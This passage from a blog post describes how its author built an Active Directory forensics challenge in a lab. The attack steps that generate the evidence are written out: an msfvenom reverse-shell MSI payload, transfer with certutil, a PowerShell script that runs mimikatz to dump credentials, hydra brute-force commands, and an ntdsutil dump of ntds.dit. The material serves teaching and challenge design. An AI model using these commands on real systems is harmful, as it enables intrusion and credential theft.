<p>We will be escalating our privileges from the “intern’s” account. To do this, we can use our favourite C2 server, Metasploit to generate the malicious <code>msi</code> file to gain the “intern” local Administrator rights.</p>
<br>

<p>Just enter this command to generate the payload, but of course… replace the IP address and port:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST<span style="color:#f92672">=</span>192.168.221.133 LPORT<span style="color:#f92672">=</span><span style="color:#ae81ff">4444</span> --encoder x64/xor --iterations <span style="color:#ae81ff">9</span> --format msi --out xyzsucks.msi
</code></pre></div><br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-64.png" alt="python-simple-server"></p>
<p>Then, to get the <code>msi</code> file onto the machine, we’ll setup a simple python server.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-65.png" alt="executing-payload"></p>
<p>Using <code>certutil</code>, you can use any other tool available, we’ll transfer the <code>msi</code> file onto the machine and execute it. Executing it. results in an error.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-66.png" alt="gained-admin-shell"></p>
<p>However, on the attacker’s side, listening on port <code>4444</code>, we caught a shell with Administrator rights!</p>
<br>

<h3 id="pivoting">Pivoting</h3>
<p>Next on the list, kerberoasting. Let me explain what kerberos is before continuing. To simplify the whole thing, kerberos is an authentication method which uses tickets to authenticate the user in the domain. The following is how it works.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-67.png" alt="pivoting-1"></p>
<ol>
<li>The user sends their <code>username</code> and <code>timestamp</code> encrypted using a key derived from their password to the <strong>Key Distribution Center (KDC)</strong>
<ol>
<li>The <strong>KDC</strong> sends back a <strong>Ticket Granting Ticket (TGT)</strong>, which is encrypted with <code>krbtgt</code> account’s password hash.</li>
<li>The <strong>TGT</strong> has a copy of the <strong>Session Key</strong>, so the KDC does not have to store Session Keys ****</li>
<li>This ticket allows users to request service tickets without entering their credentials</li>
<li>A <strong>Session Key</strong> is also given to the user</li>
</ol>
</li>
</ol>
<p><br>

<br>
</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-68.png" alt="pivoting-2"></p>
<ol>
<li>When a user wants to connect to a service
<ol>
<li>They will use the <strong>TGT</strong> to request a <strong>Ticket Granting Service (TGS)</strong></li>
<li>The user will send their <code>username</code> and a <code>timestamp</code> encrypted with the <strong>Session Key</strong></li>
<li>Along with the <strong>TGT</strong> and <strong>Service Principal Name (SPN)</strong> which indicates the Service and Server Name</li>
<li>The <strong>KDC</strong> sends a <strong>TGS</strong> and a <strong>Service Session Key</strong> which is used to access the service</li>
<li>The <strong>TGS</strong> is encrypted using the <strong>Session Owner Hash</strong></li>
<li>The <strong>TGS</strong> has a copy of the <strong>Service Session Key</strong></li>
</ol>
</li>
</ol>
<p><br>

<br>
</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-69.png" alt="pivoting-3"></p>
<ol>
<li>The <strong>TGS</strong> will then be sent along with the <code>username</code> and <code>timestamp</code> to authenticate into the service, the service will then use its account password to decrypt the the <strong>TGS</strong>* and validate the <strong>Session Key</strong></li>
</ol>
<p><br>

<br>
</p>
<p>This authentication method is vulnerable if the service account has a weak password. As the ticket granting service is encrypted with the service owner’s hash, the attacker or the “intern” can crack the password if it is a weak password. That kids, is kerberoasting.</p>
<p>For this we won’t be using impacket, we’ll be using <code>mimikatz</code> to get the service owner’s hash.</p>
<blockquote>
<p><em>Make sure to download the right version of <code>mimikatz</code> because I got errors when I downloaded the wrong version. This <a href="https://gitlab.com/kalilinux/packages/mimikatz/-/blob/3100a45278237cb7f87ef28f7edbfef4135c615c/x64/mimikatz.exe">source</a> is good.</em></p>
</blockquote>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-70.png" alt="psycho"></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">$users = @(Get-ChildItem -Path <span style="color:#e6db74">&#34;C:\Users\&#34;</span>| <span style="color:#66d9ef">foreach</span>{$_.Name})

<span style="color:#66d9ef">for</span> ($i=0; $i <span style="color:#f92672">-le</span> $users.length-1; $i++) {

    $user = $users[$i]

    $desktop = <span style="color:#e6db74">&#34;C:\Users\$user\Desktop\&#34;</span>
    $documents = <span style="color:#e6db74">&#34;C:\Users\$user\Documents\&#34;</span>
    $downloads = <span style="color:#e6db74">&#34;C:\Users\$user\Downloads\&#34;</span>
    $pictures = <span style="color:#e6db74">&#34;C:\Users\$user\Pictures\&#34;</span>
    $videos = <span style="color:#e6db74">&#34;C:\Users\$user\Videos\&#34;</span>
    
    echo <span style="color:#e6db74">&#39;ABOH23{f4Ke_fL@G}&#39;</span> &gt; <span style="color:#e6db74">&#34;</span>$($desktop)<span style="color:#e6db74">test.txt&#34;</span>
    echo <span style="color:#e6db74">&#39;ABOH23{f4Ke_fL@G}&#39;</span> &gt; <span style="color:#e6db74">&#34;</span>$($documents)<span style="color:#e6db74">test.txt&#34;</span>
    echo <span style="color:#e6db74">&#39;ABOH23{f4Ke_fL@G}&#39;</span> &gt; <span style="color:#e6db74">&#34;</span>$($downloads)<span style="color:#e6db74">test.txt&#34;</span>
    echo <span style="color:#e6db74">&#39;ABOH23{f4Ke_fL@G}&#39;</span> &gt; <span style="color:#e6db74">&#34;</span>$($pictures)<span style="color:#e6db74">test.txt&#34;</span>
    echo <span style="color:#e6db74">&#39;ABOH23{f4Ke_fL@G}&#39;</span> &gt; <span style="color:#e6db74">&#34;</span>$($videos)<span style="color:#e6db74">test.txt&#34;</span>
}

$tasks = <span style="color:#e6db74">&#34;C:\Windows\Tasks\&#34;</span>
$temp = <span style="color:#e6db74">&#34;C:\Windows\Temp\&#34;</span>

&amp;.\mimikatz.exe <span style="color:#e6db74">&#39;privilege::debug&#39;</span> <span style="color:#e6db74">&#39;sekurlsa::logonPasswords&#39;</span> <span style="color:#e6db74">&#39;token::elevate&#39;</span> <span style="color:#e6db74">&#39;lsadump::sam&#39;</span> exit

echo <span style="color:#e6db74">&#39;aSdtIGFibGUgdG8ga2VyYmVyb2FzdCB0aGlzIGFuZCBwaXZvdCB0byB0aGUgbmV4dCB3b3Jrc3RhdGlvbiwgWFlaIGNvbXBhbnkgcmVhbGx5IHN1Y2tzLiBvayBJIGhhdmUgdGhlIGhhc2hlcyBub3cgd2hhdD8gd2hhdCdzIHRoYXQgdG9vbC4uLiBoYXNoY2F0PyBtaW1pa2F0ej8gaHlkcmE/IGpvaG4/IA==&#39;</span>

$c81e728d9d4c2f636f067f89cc14862c = <span style="color:#e6db74">&#34;vqGQAAANWSURBVHhe7ZaBTeNAFAXTC8VQC6VQCYVQR2rJ6R150tfK5lAuGKKZkVZZr9fr9ftjw+kiaBQAjgLAUQA4CgBHAeAoABwFgKMAcB&#34;</span>
$45c48cce2e2d7fbdea1afc51c7c6ad26 = <span style="color:#e6db74">&#34;lK3wGvCtAjT8tI6n/9U3flIhV3LPPu/eM8w8juBwAfLQDXrKEPrmzGAyZ523FV6KlmtbvK61toqwChC6t87pmlvXf8bevK4f8gxz3bR1P0f&#34;</span>
$c4ca4238a0b923820dcc509a6f75849b = <span style="color:#e6db74">&#34;iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAYAAADDPmHLAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcd&#34;</span>
$8f14e45fceea167a5a36dedd4bea2543 = <span style="color:#e6db74">&#34;729pr7b41/F4cLMAsxg0noCaX9hJAwygx/hjeLtBfqet8wCz1DX8fbD1vr7JH1+jxhXWtvr3vj38WPCtC3ZO2noJmX34SWfgIsM6Relzm3C&#34;</span>
$a87ff679a2f3e71d9181a67b7542122c = <span style="color:#e6db74">&#34;KMAcBQAjgLAUQA4CgBHAeAoABwFgKMAcBQAjgLAUQA4CgBHAeAoABwFgKMAcBQAjgLAeUgBnp+fL6fT6fL29nYd+SDjr6+v16MPOvf9/f06&#34;</span>
$c9f0f895fb98ab9159f51fd0297e236d = <span style="color:#e6db74">&#34;pBzmZO15njWu/ULsBY86+w9wyRzMAI01NLQGlT6CS6BzFDW8DInY7cKEFrsOZ6xXNs2539Gn2urdR9be50yH8XhArS4oaGXBJKxtNA3Mscz&#34;</span>
$c20ad4d76fe97759aa27a0c99bff6710 = <span style="color:#e6db74">&#34;AAcBYCjAHAUAI4CwFEAOAoARwHgKAAcBYCjAHAUAI4CwFEAOAoARwHgKAAcBYCjAHAUAI4CoLlc/gBgwza7RtrABQAAAABJRU5ErkJggg==&#34;</span>
$d3d9446802a44259755d38e6d163e820 = <span style="color:#e6db74">&#34;wo38CfjP9IswvQAq0yvjoKMAO2Wf2O8kbvPVpf2TuJsDW53K2vlGPIkDoJ7utb//W57vtXoLkXlvrp93z/4RDvwDy+1AAOAoARwHgKAAcBY&#34;</span>
$1679091c5a880faf6fb5e6087eb1b2dc = <span style="color:#e6db74">&#34;nrKGWde3QQufcLPgqQPc521fJfrJWiroWdmuvlWDd63dyuAAzwISQ1n4DSRApRM+Feb79FjDz5/jKVqgtdObPPU0Bsl4LV3F7r3/RYua310&#34;</span>
$e4da3b7fbbce2345d7772b0674a318d5 = <span style="color:#e6db74">&#34;8sHT09Pu+Lru/5B7ZM2V7mu2e973qzysAC3gZAqQwub8/J3k+rZJju9ViKzTva73n3sN5/P57z5fXl6uI8dwqACzIG2l50pCmwGln9BCw1v&#34;</span>
$eccbc87e4b5ce2fe28308fd9f2a7baf3 = <span style="color:#e6db74">&#34;QAjgLAUQA4CgBHAeAoABwFgKMAcBQAjgLAUQA4CgBHAeAoABwFgKMAcBQAjgLAUQA4CgBHAeAoABwFgKMAcBQAjgLAUQA4CgBHAeAoABwFg&#34;</span>
$6512bd43d9caa6e02c990b0a82652dca = <span style="color:#e6db74">&#34;CjAHAUAI4CwFEAOAoARwHgKAAcBYCjAHAUAI4CwFEAOAoARwHgKAAcBYCjAHAUAI4CwFEAOAoARwHgKAAcBYCjAHAUAI4CwFEAOAoARwHgK&#34;</span>

<span style="color:#75715e"># author&#39;s note: the password to the 2nd workstation is the NTLM hash of the password of the kerberoastable account</span>
</code></pre></div><p>Now, instead of just using <code>mimikatz</code> I wanted to generate PowerShell logs as well as well generating fluff for the challenge. So, doing it John Hammond style, we’ll be using PowerShell to do this!</p>
<blockquote>
<p><em>Don’t think too much of how the script works, just know it helps to generate fluff and contains the 2nd half of the flag.</em></p>
</blockquote>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-71.png" alt="certutil-ing"></p>
<p>Similar to the <code>msi</code> file, we’ll transfer the PowerShell script as well as <code>mimikatz</code> onto the machine with <code>certutil</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-72.png" alt="powershell-script-running"></p>
<p>Executing the script, we can see that mimikatz is able to run.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-73.png" alt="http_svc-hash"></p>
<p>Along with it, the hash of the <code>http_svc</code> account.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-74.png" alt="cracking-hash"></p>
<p>Using CrackStation, we’re able to crack the service account’s hash.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-75.png" alt="ssh-connection"></p>
<p>From there, we can use <code>ssh</code> to connect to the second workstation.</p>
<br>

<h3 id="generating-logs">Generating Logs</h3>
<p>Lastly, we know that the environment has a login page to an admin page. What does that mean for us? <strong>BRUTE FORCE BABY</strong>.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-76.png" alt="wut"></p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-77.png" alt="flag-b64"></p>
<p>For the context of our challenge, one of the passwords we’re going to use is the flag encoded in base64.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-78.png" alt="wordlist-b64"></p>
<p>Then, the rest of our passwords, divided into 2 password wordlists are going to be random base64 strings.</p>
<br>

<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash"><span style="color:#75715e">#!/bin/bash
</span><span style="color:#75715e"></span>
hydra -V -l admin -P passwords.b64 192.168.221.138 http-post-form <span style="color:#e6db74">&#34;/login.php:username=^USER^&amp;password=^PASS^:Invalid username or password.&#34;</span>
hydra -V -l flag -P flag_pass 192.168.221.138 http-post-form <span style="color:#e6db74">&#34;/login.php:username=^USER^&amp;password=^PASS^:Invalid username or password.&#34;</span>
hydra -V -l admin -P passwords.b64.2 192.168.221.138 http-post-form <span style="color:#e6db74">&#34;/login.php:username=^USER^&amp;password=^PASS^:Invalid username or password.&#34;</span>
</code></pre></div><p>Looking at what we have, which is 3 wordlists, we can just automate the brute forcing with a bash script. The first line will brute force the login page with the first password wordlist, the second will give us the flag and the last line will use the 2nd set of passwords to brute force into the login page.</p>
<blockquote>
<p><em>And… as usual change the IP address to WS02’s IP address</em></p>
</blockquote>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-79.png" alt="BRUTEFORCE"></p>
<p>This generates a <strong>bunch</strong> of logs in the <code>error.log</code> file because of the module we enabled in Apache.</p>
<br>

<h2 id="acquiring-the-evidence">Acquiring the Evidence</h2>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-80.png" alt="finally"></p>
<p>From here, we’re done with red teaming and system administration! All we need to do is to collect the evidence. Pretty easy and smooth sailing from here.</p>
<br>

<h3 id="domain-controller-evidence">Domain Controller Evidence</h3>
<p>To collect the <code>ntds.dit</code> file which stands for NT Directory Service Directory Information Tree. A core database for Active Directory on Windows-based systems which contains vital information such as user accounts, group memberships, and security policies. We can use this command to extract the <code>ntds.dit</code> file as well as the <code>SAM</code> and <code>SECURITY</code> registry files that contain user hashes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">powershell <span style="color:#e6db74">&#34;ntdsutil.exe &#39;ac i ntds&#39; &#39;ifm&#39; &#39;create full c:\temp&#39; q q&#34;</span>
</code></pre></div><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-81.png" alt="backing-up-ntds"></p>
<p>Execute it within the domain controller.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-82.png" alt="location-of-artifacts"></p>
<p>You can find the files within <code>C:\temp</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-83.png" alt="organised-artifacts"></p>
<p>The different types of files are contained in their respective directories.</p>
<br>

<h3 id="workstation-evidence">Workstation Evidence</h3>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-84.png" alt="haiya"></p>
<p>Last on the list, whoa whoa whoa don’t get depressed… This is the last step! The last step is to collect a forensics triage of the workstations. I’ll only describe how to do it on one machine and you can manage the other one! The reason why we’re collecting the triage instead of a full file system acquisition is because I don’t want participants to waste storage space and time downloading the files.</p>
<p>We’ll be using Belkasoft Triage, a free tool made by Belkasoft. The reason I’m using Belkasoft Triage instead of KAPE is because it collects txt files as well. This is very useful as the PowerShell script and other hints that I put around the environment are txt files.</p>
<blockquote>
<p>I know KAPE has 3 types of triage acquisition modules but some of them do not collect txt files and if you found one that does then… the reason I use Belkasoft Triage is because “<em>sebab boleh dik”</em> <em>(in Bahasa Melayu).</em></p>
</blockquote>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-85.png" alt="asking-admin"></p>
<p>First, load the tool in a USB drive and plug it into the virtual machine. When it asks whether you want Administrator rights. Select yes, because you’re a digital forensics practitioner, you can get the Administrator password from the client.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-86.png" alt="windows-vuln-to-admin"></p>
<p>Since you can get the password from the client, we don’t need to use a Windows vulnerability to gain Administrator rights.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-87.png" alt="enter-admin-credentials"></p>
<p>From here, just enter in the Administrator’s credentials</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-88.png" alt="ram-acquisition"></p>
<p>When it asks whether you want memory acquisition, select no. I did this for the sake of the challenge, you can select yes if you have malicious software running.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-89.png" alt="source-of-artifact"></p>
<p>Then, select <code>Disk Drive</code> to acquire the whole drive.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-90.png" alt="artifact-drive"></p>
<p>Select the C drive to triage that drive.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-91.png" alt="cooking">
We then let the tool cook.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-92.png" alt="bing-chilling"></p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-93.png" alt="location-of-export"></p>
<p>When Belkasoft Triage is done triaging and analysing the drive, export the files.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-94.png" alt="exported-files"></p>
<p>The files will be in the location you set it to be. For the challenge, I wanted the participants to find the passwords to the <code>rar</code> files so I extract the <code>tar</code> files and zipped them again with the passwords I want the participants to find.</p>
<blockquote>
<p><em>This is <strong>TOTALLY</strong> not forensically sound as the investigator is not allowed to extract the artifacts and zip them again.</em></p>
</blockquote>
<br>

<h2 id="conclusion">Conclusion</h2>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-95.png" alt="graduated"></p>
<p>Yay!! Congratulations on getting to the end of the blog! I hope you learned something about Forensics, Active Directory and also System Administration. Since the environment was a rushed project, I didn’t get to find extra things to mess around with. However, as a challenge creator, I take pride in learning while creating challenge and I hope I can introduce people in my community to forensics challenges which are realistic and unique. Finally as an ending note, here’s a flag for making it to the end of the blog!</p>
<pre tabindex="0"><code>flag{KINg_Of_F0r3nS1C5} 
</code></pre>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
